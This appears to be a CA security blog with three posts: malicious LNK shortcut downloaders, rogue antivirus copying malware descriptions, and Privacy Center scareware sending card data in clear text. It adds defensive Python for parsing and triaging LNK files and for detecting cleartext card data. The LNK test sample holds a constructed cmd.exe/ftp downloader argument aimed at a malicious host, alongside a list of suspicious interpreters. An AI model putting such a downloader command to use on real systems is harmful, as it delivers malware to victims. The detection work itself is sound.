In recent cases, malicious LNK files have been crafted as Trojan downloaders, sometimes disguised as a legitimate file, program or folder to persuade the target victim to execute them.


Figure 03 shows what you would see if you dragged a malicious LNK file into a text editor such as Notepad:


In this example, a short argument is passed to cmd.exe, which connects to a malicious FTP server (ftp://g***.vicp.net) to download and execute ntdet.exe in C:\ and pub.vbs in the Windows directory. This is just one example; it demonstrates how an attacker can craft a malicious LNK file, changing its icon and downloader behaviour to suit their intent.
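Dragging the file into Notepad works because the target path, arguments and icon location are stored as plain strings inside the shortcut. The following is an added example, not code from the original post: a minimal Python parser for the Shell Link format (per MS-SHLLINK) that pulls out those fields, plus a triage rule of the kind a mail gateway or an analyst's script could apply. The two shortcuts it inspects are constructed for the example; the cmd.exe target, the FTP argument and the borrowed Internet Explorer icon are modelled on the post's description, not taken from the real file, and the redacted host name is kept exactly as the post shows it.

```python
import struct

# LinkFlags from the ShellLinkHeader (MS-SHLLINK 2.1.1); only the bits this parser needs.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# Interpreters and other living-off-the-land binaries a desktop shortcut rarely needs to launch.
SUSPICIOUS_TARGETS = {"cmd.exe", "ftp.exe", "wscript.exe", "cscript.exe",
                      "mshta.exe", "rundll32.exe", "regsvr32.exe", "powershell.exe"}
NETWORK_MARKERS = ("ftp", "http://", "https://", "\\\\")


def _string_data(buf, pos, unicode):
    """One StringData item: CountCharacters (uint16) followed by that many characters."""
    (count,) = struct.unpack_from("<H", buf, pos)
    pos += 2
    if unicode:
        return buf[pos:pos + 2 * count].decode("utf-16-le"), pos + 2 * count
    return buf[pos:pos + count].decode("cp1252", "replace"), pos + count


def parse_lnk(buf):
    """Extract target path, display name, arguments and icon location from a Shell Link file."""
    if (len(buf) < HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != HEADER_SIZE
            or buf[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link (.LNK) file")
    flags = struct.unpack_from("<I", buf, 20)[0]
    info = {"target": None, "name": None, "relative_path": None,
            "working_dir": None, "arguments": None, "icon": None}
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        (idlist_size,) = struct.unpack_from("<H", buf, pos)
        pos += 2 + idlist_size                  # skip the IDList; LinkInfo carries the path
    if flags & HAS_LINK_INFO:
        size, _hdr, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", buf, pos)
        if li_flags & 0x1:                      # VolumeIDAndLocalBasePath: LocalBasePath present
            start = pos + base_off
            info["target"] = buf[start:buf.index(b"\x00", start)].decode("cp1252", "replace")
        pos += size
    unicode = bool(flags & IS_UNICODE)
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon")):
        if flags & flag:                        # StringData items appear in exactly this order
            info[key], pos = _string_data(buf, pos, unicode)
    return info


def triage_lnk(buf):
    """Return the parsed fields plus the reasons (if any) the shortcut deserves a closer look."""
    info = parse_lnk(buf)
    reasons = []
    target = (info["target"] or info["relative_path"] or "").lower().replace("/", "\\")
    base = target.rsplit("\\", 1)[-1]
    if base in SUSPICIOUS_TARGETS:
        reasons.append("target is an interpreter or LOLBin: " + base)
    args = (info["arguments"] or "").lower()
    if any(marker in args for marker in NETWORK_MARKERS):
        reasons.append("arguments reference a network location")
    icon_base = (info["icon"] or "").lower().replace("/", "\\").rsplit("\\", 1)[-1]
    if icon_base and base and icon_base != base:
        reasons.append("icon borrowed from another file: " + icon_base)  # weak signal on its own
    return info, reasons


def build_sample_lnk(target, arguments, name, icon):
    """Assemble a minimal .LNK (header + LinkInfo + StringData). Used only to construct test input."""
    flags = HAS_LINK_INFO | HAS_NAME | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # attrs, 3 times, size, icon idx, SW_SHOWNORMAL
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"   # DRIVE_FIXED, empty label
    local_base = target.encode("cp1252") + b"\x00"
    base_off = 0x1C + len(volume_id)
    suffix_off = base_off + len(local_base)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, 0x1C, base_off, 0, suffix_off)
    link_info += volume_id + local_base + b"\x00"

    def sd(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + link_info + sd(name) + sd(arguments) + sd(icon)


# Constructed samples, not the post's real file.
MALICIOUS_LNK = build_sample_lnk(
    target=r"C:\Windows\System32\cmd.exe",
    arguments=r"/c ftp -s:%TEMP%\f.txt g***.vicp.net",
    name="Internet Explorer",
    icon=r"C:\Program Files\Internet Explorer\iexplore.exe")
BENIGN_LNK = build_sample_lnk(
    target=r"C:\Program Files\Internet Explorer\iexplore.exe", arguments="",
    name="Internet Explorer", icon=r"C:\Program Files\Internet Explorer\iexplore.exe")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        info, reasons = triage_lnk(blob)
        print(label, info["target"], repr(info["arguments"]), reasons)
```

The parser deliberately reads the path from LinkInfo and skips the IDList, which is enough for shortcuts to local files; a shortcut that carries only an IDList (no LinkInfo) would need the PIDL decoded as well. The icon rule is listed last because many legitimate shortcuts also point their icon at a system DLL; on its own it is a hint, combined with a cmd.exe target and an FTP argument it is a strong one.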

Furthermore, Windows users may receive this threat through email, via a browser exploit, and/or bundled with other malicious files.

Take extra precautions with this kind of trick by following our recommendations below:

  •  Think twice before clicking on a shortcut file. If in doubt, drag the file into Notepad and check for suspicious strings (the shortcut's Properties dialog also shows the Target and its arguments).
  •  Include the .LNK extension in your list of blocked email attachments; this is a must for enterprise email filtering.
  •  Stay up to date with software patches to close off exploit attack vectors.
  •  Make sure your security software is working and has the latest signature update.

Stay Safe!


Spyware Protect 2009 copies malware descriptions

Published: May 27 2009, 10:19 PM | no comments
by Zarestel Ferrer

Rogue security software often uses skins to change its graphical user interface (GUI), so that a new version can easily be created once the previous one becomes recognisable as fake security software. Sometimes the GUI is a replica of legitimate security software, to trick unsuspecting users.

Aside from GUIs, rogue security software also copies malware descriptions from the websites of reputable security vendors. Spyware Protect 2009 has been spotted copying descriptions from the CA Spyware Encyclopedia.



Here are some examples, showing CA's description first, followed by Spyware Protect 2009's plagiarized version.

CA
[Screenshot – CA Spyware Encyclopedia description]

Spyware Protect 2009
[Screenshot – Spyware Protect 2009's copy of the description]


In both cases the descriptions are brief - coincidence?

Here is another example.

CA
[Screenshot – CA Spyware Encyclopedia description]

Spyware Protect 2009
[Screenshot – Spyware Protect 2009's copy of the description]

CA is not the only site from which Spyware Protect 2009 has copied malware descriptions, but this highlights how desperate the people behind this rogue security software are to trick users.

Since last week this rogue security software has reportedly been distributed on a massive scale through compromised and malicious websites, so please be observant.
 
CA detects this malware as Win32/SpywareProtect2009. For a list of the files and registry entries it drops, please refer to the CA Spyware Encyclopedia description page.



Double Jeopardy with Privacy Center

Published: May 20 2009, 12:25 AM | 1 Comment(s)
by Zarestel Ferrer

[Figure 1 – Privacy Center GUI]

Recently we were investigating "Privacy Center", rogue security software (scareware) distributed during the wave of "nude Rihanna photos" lures, when we saw the following window.

[Figure 2 – Privacy Center's Transaction Processing page]


As you can see in Figure 2, this rogue security software costs $79.90; not cheap for a fake.

So we checked our website to compare the cost of our legitimate software against the cost of Privacy Center. Interestingly, our software costs around the same amount (Figure 3):

CA Internet Security Suite Plus - license valid for up to 5 PCs for $79.99 plus free PC Optimize Scan.

CA Antivirus Plus CA Antispyware 2009 - license valid for up to 3 PCs for $49.99 plus free PC Optimize Scan.

* prices are correct at time of writing

How many times have we all wondered, when shopping, whether the more expensive product is of superior quality to the cheaper one? The pricing of this rogue software taps into those same consumer instincts. The distributors of Privacy Center have effectively hidden the rogue software amongst legitimate security products in the same price range.

[Figure 3 – CA Internet Security Suite Plus 2009 webpage]


Going back to the "Privacy Center" scareware, we have noticed a couple of fraudulent claims.

"Secure" Page

[Figure 4 – Secured Logos]

As you can see in Figure 4, the window displays a "Positive SSL Secured Website" logo, which is not what we saw in the background. Using our set of tools to investigate this claim, we found that the process is not using HTTPS (HTTP over SSL/TLS) at all. Instead, as seen in Figure 5 below, it uses plain HTTP. A logo image proves nothing; only the browser's own indicators, or a look at the traffic itself, tell you whether a connection is encrypted.

[Figure 5 – HTTP transaction]

I have experimented by filling in both the personal information and payment information fields. It is NOT surprising that the personal information was transmitted in clear text, as shown in the sniffed transactions below [Figures 6, 7 & 8].

[Figure 6 – NOT Secure Transaction]

[Figure 7 – Packet Stream]

[Figure 8 – Visible Credit Card Details]

The personal information (first name, last name, city, country, state, address, zip code, email address and phone number) is all in clear text. So is the payment information: the card number, expiration date and card verification value (CVV) are all visible to the sniffer.

In this scenario, not only has the victim been ripped off by the scareware; something far more sinister has happened. The victim's personal and payment information has been exposed to anyone able to observe the traffic, as well as to the scareware operators themselves, and could now be used for further fraud.
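What the sniffer sees in Figures 6 to 8 is exactly what a network DLP or IDS sensor can be made to flag. The following is an added example, not code from the original post: a Python routine that takes a raw HTTP request as captured off the wire, parses the form body, and reports card data travelling in the clear, using the Luhn checksum to separate card numbers from phone numbers and other digit strings. The captured request, its host, path, field names and values are all constructed for this example and are not taken from the Privacy Center transaction.

```python
from urllib.parse import parse_qsl

# Constructed capture of a plain-HTTP purchase request of the kind the post sniffed.
# Host, path, field names and values are assumptions made for this example.
_BODY = (b"first=Jane&last=Doe&city=Melbourne&country=AU&zip=3000&phone=5551234567"
         b"&email=jane%40example.test&card=4111111111111111&exp=12%2F11&cvv=123")
CAPTURED_REQUEST = (b"POST /order/process.php HTTP/1.1\r\n"
                    b"Host: pay.example.test\r\n"
                    b"Content-Type: application/x-www-form-urlencoded\r\n"
                    b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n\r\n" + _BODY)

CVV_FIELDS = {"cvv", "cvv2", "cvc", "cid", "csc"}
EXPIRY_FIELDS = {"exp", "expiry", "expdate", "exp_date"}


def luhn_ok(digits):
    """Luhn checksum used by payment card numbers; rejects most phone numbers, IDs and typos."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                      # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", len(body)))
    return method, path, headers, body[:length]


def find_cleartext_card_data(raw):
    """Return (field, kind, masked value) for every payment-card element visible in the clear."""
    method, _path, headers, body = parse_http_request(raw)
    hits = []
    if method != "POST" or "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return hits
    for name, value in parse_qsl(body.decode("iso-8859-1")):
        digits = value.replace(" ", "").replace("-", "")
        if digits.isdigit() and 13 <= len(digits) <= 19 and luhn_ok(digits):
            # Keep only the first six and last four digits, the usual masking rule for logs.
            hits.append((name, "PAN", digits[:6] + "*" * (len(digits) - 10) + digits[-4:]))
        elif name.lower() in CVV_FIELDS and digits.isdigit() and len(digits) in (3, 4):
            hits.append((name, "CVV", "*" * len(digits)))
        elif name.lower() in EXPIRY_FIELDS:
            hits.append((name, "EXPIRY", value))
    return hits


if __name__ == "__main__":
    for hit in find_cleartext_card_data(CAPTURED_REQUEST):
        print(hit)
```

The same request sent over HTTPS would give this observer only a TLS handshake and ciphertext, which is precisely the protection the "Positive SSL Secured" logo claimed and the site did not provide. The masking in the output matters too: a sensor that alerts on card data should never write the full number into its own logs.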

Privacy Center is detected by CA as Win32/PrivacyCenter.A and most of its components are detected as Win32/FakeAV variants.

Protect yourself by keeping your CA Security Products up to date!


*Thanks to Kim Thorogood for her valuable contribution to this blog entry

